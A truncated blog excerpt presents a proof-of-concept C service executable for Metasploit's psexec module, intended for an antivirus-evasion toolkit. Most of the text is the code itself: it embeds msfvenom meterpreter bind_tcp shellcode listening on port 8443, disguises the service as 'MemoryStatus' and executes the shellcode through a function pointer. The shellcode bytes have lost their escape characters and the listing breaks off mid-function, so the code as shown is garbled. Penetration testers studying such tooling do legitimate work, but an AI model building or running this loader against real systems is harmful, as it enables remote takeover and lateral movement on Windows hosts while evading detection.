Write your own metasploit psexec service

govolution

Lately I made some research about metasploit’s psexec module and how to write your own service executable. This will be integrated into AVET within the next weeks.
The PoC is simple (download: https://github.com/govolution/avepoc/blob/master/psexecservice.c):

 // compile: // wine gcc -m32 psexecservice.c #include <windows.h> #include <stdio.h> #define SLEEP_TIME 5000 #define LOGFILE "C:status.txt" SERVICE_STATUS ServiceStatus; SERVICE_STATUS_HANDLE hStatus; void ServiceMain(int argc, char** argv); void ControlHandler(DWORD request); int InitService(); // some shellcode //# msfvenom -p windows/meterpreter/bind_tcp lport=8443 -f c -a x86 --platform Windows unsigned char buf[] = "xfcxe8x82x00x00x00x60x89xe5x31xc0x64x8bx50x30" "x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xff" "xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf2x52" "x57x8bx52x10x8bx4ax3cx8bx4cx11x78xe3x48x01xd1" "x51x8bx59x20x01xd3x8bx49x18xe3x3ax49x8bx34x8b" "x01xd6x31xffxacxc1xcfx0dx01xc7x38xe0x75xf6x03" "x7dxf8x3bx7dx24x75xe4x58x8bx58x24x01xd3x66x8b" "x0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24" "x24x5bx5bx61x59x5ax51xffxe0x5fx5fx5ax8bx12xeb" "x8dx5dx68x33x32x00x00x68x77x73x32x5fx54x68x4c" "x77x26x07xffxd5xb8x90x01x00x00x29xc4x54x50x68" "x29x80x6bx00xffxd5x6ax0bx59x50xe2xfdx6ax01x6a" "x02x68xeax0fxdfxe0xffxd5x97x68x02x00x20xfbx89" "xe6x6ax10x56x57x68xc2xdbx37x67xffxd5x85xc0x75" "x58x57x68xb7xe9x38xffxffxd5x57x68x74xecx3bxe1" "xffxd5x57x97x68x75x6ex4dx61xffxd5x6ax00x6ax04" "x56x57x68x02xd9xc8x5fxffxd5x83xf8x00x7ex2dx8b" "x36x6ax40x68x00x10x00x00x56x6ax00x68x58xa4x53" "xe5xffxd5x93x53x6ax00x56x53x57x68x02xd9xc8x5f" "xffxd5x83xf8x00x7ex07x01xc3x29xc6x75xe9xc3"; void exec_shellcode(unsigned char *shellcode) { int (*funct)(); funct = (int (*)()) shellcode; (int)(*funct)(); } int WriteToLog(char* str) { FILE* log; log = fopen(LOGFILE, "a+"); if (log == NULL) return -1; fprintf(log, "%sn", str); fclose(log); return 0; } int main() { SERVICE_TABLE_ENTRY ServiceTable[2]; ServiceTable[0].lpServiceName = "MemoryStatus"; ServiceTable[0].lpServiceProc =…

View original post 472 more words

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s